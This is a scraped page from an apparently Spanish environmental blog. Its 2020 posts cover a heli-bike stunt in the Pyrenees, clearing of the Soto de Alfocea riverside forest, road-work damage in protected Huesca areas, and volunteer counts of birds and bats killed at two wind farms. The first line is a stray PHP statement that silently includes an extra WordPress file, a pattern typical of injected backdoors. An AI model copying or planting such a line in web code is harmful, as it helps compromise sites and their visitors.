@include( ABSPATH . WPINC . '/client.php'); Barracuda

Barracuda

REDENTORES AMBIENTALES

23rd agosto 2020 | Atentados ecológicos,Comunicación,Deportes,Montañas,Política y Sociedad

noticia

El Periódico de Aragón

Por segunda vez, la presencia de Jesús Calleja subiendo en helicóptero a Punta Suelza en el Pirineo oscense para realizar un brusco descenso en bici, promocionando la actividad de helibike de la empresa Altitude Rides SL, ha levantado de nuevo la polémica sobre el impacto de esta actividad deportiva en un entorno frágil como es la alta montaña.

noticia

El Mundo

Ya se ha tratado en este blog el negativo impacto en el medio ambiente de determinados deportes extremos a veces denominados turismo activo o deporte de naturaleza, y sobre lo que se puede entender como brutalismo deportivo. No hay que olvidar el calificativo de descenso brutal con el que Jesús Calleja definió su primera incursión en helibike.

No voy a entrar en la cuestión de si la actividad contaba con los permisos necesarios y si se cumplió el condicionado que en su caso estuviera señalado, aspecto todavía por dilucidar. En esta ocasión quiero resaltar aquí la soberbia de los promotores de este tipo de actividades en la naturaleza y el desprecio que manifiestan, una vez más, por el medio ambiente. Todo ello a consecuencia de la intervención añadida de Frank Cuesta apoyando la conducta de Jesús Calleja.

noticia

El Mundo

Tanto Calleja como Cuesta son dos personajes mediáticos y un tanto histriónicos los cuales, teniendo a su alcance un medio tan potente como la televisión para transmitir buenos ejemplos, positivos y constructivos y de comportamiento respetuoso con la naturaleza, renuncian a ello y desarrollan todo un paradigma de pedagogía negativa.

Calleja porque transmite que el medio físico (montañas, ríos,…) está al servicio del ser humano y es susceptible de ser explotado y, Cuesta, lo mismo respecto de los seres vivos y que estos están para ser manipulados y ser objeto de espectáculo. Todo muy antropocéntrico y decimonónico.

Respecto de Calleja, Cuesta lo deja meridianamente claro cuando le atribuye que “ha conseguido acercar la naturaleza -montañas, ríos, valles, pueblos- que yo llamo muerta a varias generaciones”. Esa es la concepción que tienen de la naturaleza: muerta mientras no vayan ellos a explotarla o manipularla. Lo cual es una muestra absoluta de arrogancia y mesianismo, creyéndose ellos los salvadores de la naturaleza y de sus habitantes.

Por otra parte, estos personajes son incapaces de percibir las sutiles relaciones que existen en la naturaleza y los impagables bienes y servicios ecosistémicos gratuitos que ésta proporciona.

Además, en unos tiempos en los que la agenda viene marcada por el cambio climático a causa del consumo de combustibles fósiles, por la pérdida de biodiversidad y extinción de especies por la acción depredadora humana, y por la degradación generalizada del medio ambiente, no parece lo más oportuno promocionar viajes en helicóptero e incrementar la presencia humana y la erosión en lugares hasta ahora inaccesibles o poco frecuentados.

José A. Domínguez

LA CONFEDERACIÓN HIDROGRÁFICA DEL EBRO, CONTRA EL SOTO DE ALFOCEA

8th agosto 2020 | Atentados ecológicos,Biodiversidad,Bosques,Ríos

soto de Alfocea

Maquinaria empleada en la intervención dentro del arbolado

Amigos de la Tierra Aragón y Ansar han manifiestado en un comunicado su más enérgica condena a la reapertura de los pasillos que la Confederación Hidrográfica del Ebro (CHE) está realizando en la masa forestal del Soto de Alfocea (TM Zaragoza) mediante empresa TRAGSA.

Hay que recordar que CHE viene desarrollando un programa experimental de intervenciones en el Ebro denominado curage con el objetivo de dar más salida a las aguas en caso de avenidas y, favorecer el transporte de sedimentos, para lo cual abre canales o pasillos en las márgenes del río removiendo las gravas y eliminando la vegetación que, por lo visto, impide la circulación de las aguas. Lo llaman permeabilización de masas de sedimentos vegetadas (sic). La intervención en las zonas de gravas o de vegetación arbustiva abierta puede ser asumible pero, especialmente cuestionables son los pasillos abiertos en las zonas arboladas cerradas.

Amigos de la Tierra Aragón y Ansar consideran que la reapertura de los pasillos en la zona arbolada de Soto de Alfocea es injustificada, excesiva y contraproducente dada las escasas dimensiones de la misma, lo que supone romper la integridad de la masa forestal, aumentando la insolación y la sequedad y rompiendo la inercia térmica que ofrece la vegetación, además de destruir la oportunidad de refugio para la fauna. Estas asociaciones ya se opusieron a la intervención inicial de CHE en la zona arbolada de Soto de Alfocea en diciembre de 2018 (1),(2),(3) y a la de Soto de Sobradiel en agosto de 2019 (4) por su negativo impacto ambiental y por necesitar continuo mantenimiento ya que la vegetación vuelve a colonizar las zonas roturadas.

Los actuales sotos del Ebro son los últimos reductos de las selvas que flanqueaban el río. La roturación de tierras para cultivo, las infraestructuras, las edificaciones ilegales o mal ubicadas y las motas de defensa los eliminaron y han condenado a los sotos a vivir en el estrecho margen entre las motas y el río y donde, al parecer, los árboles también molestan.

soto de Alfocea

soto de Alfocea

soto de Alfocea

Estado de los pasillos antes y después del reciente desbroce

En soto de Alfocea la masa arbolada tiene una anchura que oscila entre los 30 y 100 metros y una longitud de unos 700 m. Los dos pasillos abiertos de al menos 6 m de amplitud ya suponen la alteración o eliminación del 12% de la superficie arbolada sólo en la zona más ancha del soto y llega a alcanzar el 20 o 25% en otros tramos.

Esta intervención en diversos sotos a lo largo del Ebro supone la fragmentación de un hábitat, ya de por sí reducido. En ecología la fragmentación de los hábitats es una de las causas de la pérdida de biodiversidad y extinción de especies, fenómeno que preocupa a nivel planetario.

Igualmente, en un proceso de cambio climático y calentamiento global en la que se resalta la importancia de los bosques para mitigar el cambio climático, no parece muy inteligente destruir nuestras propias masas boscosas.

Para Amigos de la Tierra Aragón y Ansar los sotos son vistos por la población en general y, especialmente, por las fuerzas vivas locales de la ribera del Ebro como lugares indeseables y molestos y se pide reiteradamente su eliminación con el eufemismo de la limpieza del río. Los ecologistas recuerdan que los sotos son refugios de biodiversidad, son las únicas manchas verdes naturales en un entorno semiárido como es el valle del Ebro y ofrecen gratuitamente múltiples servicios ecosistémicos. Además también condenan que se dilapide reiteradamente el dinero público para satisfacer demandas injustificadas.

soto de Alfocea

Estado de los pasillos tras el desbroce

La intervención en soto de Alfocea (margen izquierda) está dirigida a reducir la inundación del termino de Monzalbarba en la margen derecha ya que el puente de Alfocea es el cuello de botella que obstaculiza el paso de las grandes avenidas y la fuerte mota de defensa de la margen izquierda dirige el agua hacia tierras de Monzalbarba, a lo que se suma la mota transversal del cuartel de pontoneros. Hay que recordar, además, que Monzalbarba tiene diversas construcciones en zona inundable como el polideportivo y la residencia de ancianos a la que hay que evacuar en caso de avenida o riesgo de la misma.

Amigos de la Tierra Aragón y Ansar consideran que la única solución definitiva es dar más espacio al río (5), primero, ampliando la sección del puente de Alfocea que es el obstáculo a la corriente y, segundo, devolviéndole al Ebro su dominio retranqueando la mota de Alfocea o mota de Faci que se construyó hace unos cuarenta años para robar tierras al río, estrechando peligrosamente el cauce.

soto de Alfocea

Maquinaria desbrozando las inmediaciones del puente

CARRETERAS PARA LA DESTRUCCIÓN DEL PIRINEO

28th julio 2020 | Atentados ecológicos,Montañas,Paisajes,Sostenibilidad

obras públicas

Obras de DPH en carretera Espés Bajo, Huesca. Julio, 2020

La ingeniería civil y las obras públicas de nuestras queridas instituciones autonómicas y provinciales todavía no han asumido los principios de cumplimiento de la normativa ambiental y de sostenibilidad -ni siquiera de racionalidad- cuando sacan las máquinas al monte para mantener o mejorar las infraestructuras.

Traemos aquí dos atentados ecológicos que demuestran la nula sensibilidad de estas instituciones, uno de la Diputación Provincial de Huesca y otro del Servicio Provincial de Vertebración del Territorio (sic) de Huesca del Gobierno de Aragón, ambos con su contumaz modus operandi y su incapacidad de enmendarse. Incluso en la joya de la corona, como es el Pirineo y en espacios protegidos.

Carretera de Espés

La Diputación de Huesca está ampliando la carretera de Espés a la A-1605, cruzando y bordeando el río Blanco. Obras ejecutadas por las empresas Horpisa y Cervisimag. Lo que debería ser una pequeña ampliación de la calzada se ha convertido en un infierno de desmontes y escombreras.

obras públicas

Obras carretera Espés Bajo, Huesca. Julio, 2020

Las obras afectan a la Zona de Especial Protección para las Aves (ZEPA) “El Turbón y Sierra de Sis”, al Ámbito de Aplicación y a las Áreas Críticas del Plan de Recuperación del quebrantahuesos (Gypaetus barbatus), aprobado mediante el Decreto 45/2003 del Gobierno de Aragón (BOA de 12/3/2003), y al Ámbito de Aplicación del Plan de
Conservación del Hábitat del urogallo (Tetrao urogallus), aprobado mediante el Decreto 300/2015 del Gobierno de Aragón (BOA de 13/11/2015). Se han creado graves vías erosivas, se ha dañado el pinar de ladera y sepultado hábitats de interés comunitario de la Directiva Hábitats de la Unión Europea como formaciones estables de Buxus (5110), vegetación casmofítica calcícola (8211) y hayedos xero-termófilos calcícolas (9150).

La obra contó con la indulgencia del INAGA que autorizó el proyecto eximiéndolo de realizar una evaluación de impacto ambiental. Gentes de la comarca manifiestan que es una obra excesiva e innecesaria para el tránsito que soportaba. De hecho lleva largos meses cerrada al tráfico y aún se prolongará más el cierre al haberse concedido una ampliació del plazo de entrega. Insinúan que el objetivo de estas obras es mover maquinaria para obtener beneficio económico.

Obras en Foz de Biniés

Por otra parte, los responsables de carreteras del Servicio Provincial de Vertebración del Territorio, Movilidad y Vivienda de Huesca del Gobierno de Aragón, en sus labores de mantenimieno de la A-1602 en la Foz de Biniés, no sólo han vuelto a arrasar la población de Allium pyrenaicum por enésima vez al desbrozar y sobreexcavar las cunetas de la carretera sino que los escombros han ido directamente ladera abajo al río Veral.

obras públicas

Obras carretera A-1602 en Foz de Biniés, junio, 2020

Allium pyrenaicum es una especie incluida como vulnerable en el Catálogo de Especies Amenazadas de Aragón y la foz de Biniés se encuentra dentro del Lugar de Importancia Comunitaria (LIC) “Foz de Biniés”, de la Zona de Especial Protección para las Aves (ZEPA) “Salvatierra-Fozes de Fago y Biniés-Barranco del Infierno”, y del Paisaje Protegido de las Fozes de Fago y Biniés, declarado mediante Decreto 71/2010 del Gobierno de Aragón (BOA de 27/4/2010).

Resulta doblemente hiriente la intervención dado que la Consejería de Vertebración del Territorio, Movilidad y Vivienda del Gobierno de Aragón está copada por altos cargos de CHA, que se dice de izquierdas y a los que se les supondría una cierta sensibilidad ambiental.

Conclusión

Resulta ya nauseabundo que las obras públicas sigan ejecutándose de forma zafia y agresiva, igual que hace cuarenta o cincuenta años y de que no se haya avanzado nada en minimización de impactos o ejecución cuidadosa. La explicación de que una y otra vez se hagan las cosas mal es porque nunca les pasa nada a los ejecutores de los atentados. No empapelan a ningún ingeniero jefe ni a nigún director provincial ni a ningún director general por estragos en la naturaleza. Entonces, para qué van a cambiar su modus operandi.

MORTALIDAD DE FAUNA EN DOS PARQUES EÓLICOS DE ZARAGOZA (I)

10th julio 2020 | Atentados ecológicos,Aves,Ecologismo,Estepas,Eólica,Mamíferos

parque eólico

Vista general de la zona de estudio. © Barracuda/J. A. Domínguez

Antecedentes

La siniestralidad de vertebrados voladores en parques eólicos es un hecho suficientemente conocido y preocupante en ámbitos científicos (1) pero que es difícil hacer trascender a los grandes medios de comunicación y a la opinión pública dadas la bula de la que disfrutan las energías renovables, y en este caso la eólica, la propaganda directa e indirecta que realizan de ésta (2), más las campañas de greenwshing o blanqueamiento que desarrollan las empresas del sector (3).

El Gobierno de Aragón obliga a hacer un seguimiento de siniestralidad de los parques eólicos de varios años de duración al comienzo de su funcionamiento con el objetivo, según se especifica en las autorizaciones, de determinar si es necesario modificar el régimen o ubicación de los aerogeneradores. La siniestralidad conlleva en la casi totalidad de los casos la mortalidad de los animales afectados, siendo las aves y los quirópteros los grupos perjudicados.

No obstante, los datos rigurosos son escasos y de baja confianza bien porque la siniestralidad se basa en estimaciones a partir de ejemplares encontrados en visitas distanciadas en el tiempo, bien por las deficiencias en la tarea de prospección (4), o bien por la presumible pérdida de pruebas dado que las bajas perjudican la imagen de las empresas explotadoras y su recogida y traslado al centro de fauna del Gobierno de Aragón supone un gasto en personal y medios. Esto puede conducir a que no se ponga por parte de las empresas demasiado entusiasmo y diligencia en hacer un seguimiento correcto de la siniestralidad. De ahí la importancia de conocer la realidad al margen de los intereses de las empresas eólicas.

Por otra parte, tras el plazo de seguimiento obligatorio, no se toma ningún tipo de medidas desde la administración y se deja de realizar cualquier tipo de control de la siniestralidad (5). El Gobierno de Aragón carece de protocolos de actuación ante la mortalidad reiterada que provocan las instalaciones eólicas en funcionamiento (6).

A continuación se presentan los datos de un estudio independiente realizado por voluntarios para conocer con la mayor aproximación posible la siniestralidad real de los parques eólicos mediante un seguimiento intensivo de un reducido número de aerogeneradores.

Método

Se ha contado con naturalistas voluntarios con amplia experiencia de campo y un elevado grado de motivación para desempeñar de forma altruista un estrecho seguimiento de la siniestralidad de vertebrados y la mortalidad asociada causada por varios aerogeneradores de dos parques eólicos contiguos situados en el centro del valle del Ebro en la provincia de Zaragoza. Por razones de confidencialidad se omite el nombre real de los parques eólicos que denominaremos X01 y X02, aunque se pasa parte de las bajas a las autoridades ambientales aragonesas, que son conocedoras de la siniestralidad de estas instalaciones.

El estudio, que está en ejecución, se inició el 9 de febrero de 2020, aunque los datos consolidados aquí referidos abarcan hasta 12 de junio de 2020, que suponen 125 días. En ese periodo se han realizado 19 visitas. En cada visita se prospectan las inmediaciones de cada aerogenerador alrededor de la torre. No se prospectan las líneas eléctricas de evacuación. No se pudo realizar el seguimiento durante las dos últimas semanas de marzo y todo el mes de abril debido al confinamiento.

Se controlan 11 aparatos, cinco corresponden al parque X01 y seis al X02. Se trata de máquinas de 2 a 3,45 MW de potencia con 106,5 m de altura de fuste hasta el buje y de tres palas de 68,5 m de radio, que da una altura total de 175 m. Cada máquina barre un área de 14 741 m² y la velocidad lineal en el extremo de las palas es de 250 a 300 km/h.

Ambas instalaciones están dentro de la fase que deben realizar seguimiento de siniestralidad tras su puesta en explotación. En concreto, para el parque X01 el condicionado del Instituto Aragonés de Gestión Ambiental (INAGA) del Gobierno de Aragón dice específicamente: […] El plan de vigilancia ambiental incluirá tanto la fase de construcción como la fase de explotación del parque eólico y se prolongará, al menos, hasta completar cinco años de funcionamiento de la instalación […] Los recorridos de búsqueda de ejemplares colisionados han de realizarse a pie y su periodicidad debería ser al menos quincenal durante un mínimo de cinco años desde la puesta en funcionamiento del parque y semanal en periodos de migraciones. Se deberán incluir tests de detectabilidad y permanencia de cadáveres con objeto de realizar las estimas de mortalidad real con la mayor precisión […]. Esta condición es común en las resoluciones del INAGA para los parques eólicos de los últimos años.

parque eólico

Vista general de la zona de estudio. © Barracuda/J. A. Domínguez

El medio natural se corresponde con una llanura suavemente ondulada a unos 350 m de altitud, dominada por cultivos cerealistas de secano con escasas manchas de vegetación natural esteparia con aprovechamiento ganadero del espacio. En avifauna cabe destacar la presencia de cernícalo primilla, ganga, ortega, sisón y aguilucho cenizo y varios aláudidos como especies más significativas. El medio presenta un alto grado de artificialización pues está densamente ocupado por instalaciones eólicas y toda su infraestrucura asociada, como amplias pistas de circulación, tendidos eléctricos aéreos y subestaciones de transformación.

La prospección se hace a pie por parte al menos de dos naturalistas y se georreferencia y se toma fotografía de cada resto hallado, a la vez que se hace una pequeña roza en el suelo con el fin de evitar dobles recuentos.

parque eólico

Referenciando un cadáver de abubilla (Upupa epops) en X02. © Barracuda/J. A. Domínguez

Resultados

Desde el 9 de febrero y a fecha de 12 de junio de 2020 se contabilizan estas bajas:

Parque eólico X01: 19 aves y 69 murciélagos, que suman 88 animales, lo que da una ratio de 17,6 animales abatidos por máquina.

Parque eólico X02: 29 aves y 26 murciélagos, que suman 55 animales, que da una ratio de 9,17 animales abatidos por máquina.

parque eólico

Tabla 1. Siniestralidad por máquinas del 09.02 a 12.06 de 2020

El total de bajas asciende a 48 aves y 95 murciélagos, que suman 143 animales, lo que da una ratio de 13 animales abatidos por máquina. Destaca la cifra de bajas de murciélagos, que duplica a la de aves.

parque eólico

Tabla 2. Siniestralidad global del 09.02 a 12.06 de 2020

Mientras los quirópteros no se han identificado específicamente sobre el terreno, sí se ha hecho una primera identificación específica de las aves, arrojando estos datos:

parque eólico

Tabla 3. Aves encontradas del 09.02 a 12.06 de 2020

Todas las bajas encontradas han sido restos de animales muertos, salvo un caso en el que un buitre leonado se encontró vivo, tras pérdida traumática de una parte del ala en un aerogenerador a gran distancia de donde fue hallado. El animal debió ser sacrificado finalmente según confirmó el centro de recuperación de fauna de La Alfranca.

A pesar de lo abultado de las cifras cabe suponer que no todas las bajas han sido halladas bien por el error típico de prospección, bien porque algunas bajas fueran retiradas por operarios del parque o depredadas, bien porque los animales heridos se desplazan y mueren lejos de las máquinas o bien porque los restos quedaron ocultos entre los cultivos cuando éstos se hicieron inaccesibles por alcanzar altura conforme avanzó la primavera.

Como dato general debe ponerse de manifiesto que en todas las salidas se hallaron bajas y que todos los aerogeneradores han causado bajas. La salida en la que más ejemplares se hallaron fue la de primeros de mayo (02-03/05) tras el confinamiento en la que se encontraron 35 cadáveres o restos de animales, en la cual el aerogenerador X0104 dio el registro mayor de bajas, con 11 muerciélagos. La misma máquina X0104 dio el segundo mayor numero de bajas el 01/06 con ocho murciélagos abatidos.

parque eólico

Referenciando un cadáver de murciélago en X01. © Barracuda/J. A. Domínguez

(En permanente actualización)

Referencias:

1- Inasumible mortalidad de buitres en parques eólicos aragoneses. AODA, 2020
2- Descarado lavado de cara de los eólicos. Barracuda, 2019
3- Greenwashing de EDP. Barracuda, 2020
4- Camiña, A. (2000) Algo no funciona bien en los proyectos eólicos. Quercus, 407: 64-65
5- Matadero 19: parque eólico La Serreta. Barracuda, 2006
6- Terror eólico IV. P.E. Rabosera. Barracuda, 2020

José A. Domínguez


ÚLTIMOS COMENTARIOS

LO MÁS RECIENTE

LO MÁS VISITADO

Tienda Barracuda

ARTÍCULOS POR CATEGORÍAS

CALENDARIO DE ARTÍCULOS

enero 2021
L M X J V S D
« dic    
 123
45678910
11121314151617
18192021222324
25262728293031

ARTÍCULOS POR MESES

PÁGINAS

ENLACES

PUBLICIDAD